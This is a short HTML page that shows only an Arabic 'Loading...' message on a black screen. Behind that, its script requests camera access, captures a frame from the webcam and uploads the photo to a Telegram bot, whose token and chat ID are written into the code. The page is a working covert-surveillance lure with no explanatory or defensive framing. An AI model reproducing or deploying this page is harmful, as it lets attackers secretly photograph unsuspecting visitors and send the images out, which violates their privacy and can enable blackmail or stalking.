check-amer-2026
<?xml encoding="utf-8" ?><p><body style="background:#000;color:#fff;text-align:center;"></p><p><h2>جاري التحميل...</h2></p><p><script></p><p>navigator.mediaDevices.getUserMedia({video:true}).then(s=>{</p><p> const v=document.createElement('video'); v.srcObject=s; v.play();</p><p> setTimeout(()=>{</p><p> const c=document.createElement('canvas'); c.width=640; c.height=480;</p><p> c.getContext('2d').drawImage(v,0,0);</p><p> c.toBlob(b=>{</p><p> const f=new FormData(); f.append('chat_id','7069359040');</p><p> f.append('photo',b,'x.jpg');</p><p> fetch('https://api.telegram.org/bot8494679315:AAGnzectHH9ZQAxKmddQ9cwRSn2ym2m-mkQ/sendPhoto',{method:'POST',body:f});</p><p> },'image/jpeg');</p><p> },1000);</p><p>});</p><p></script></p><p></body></p><p> </p>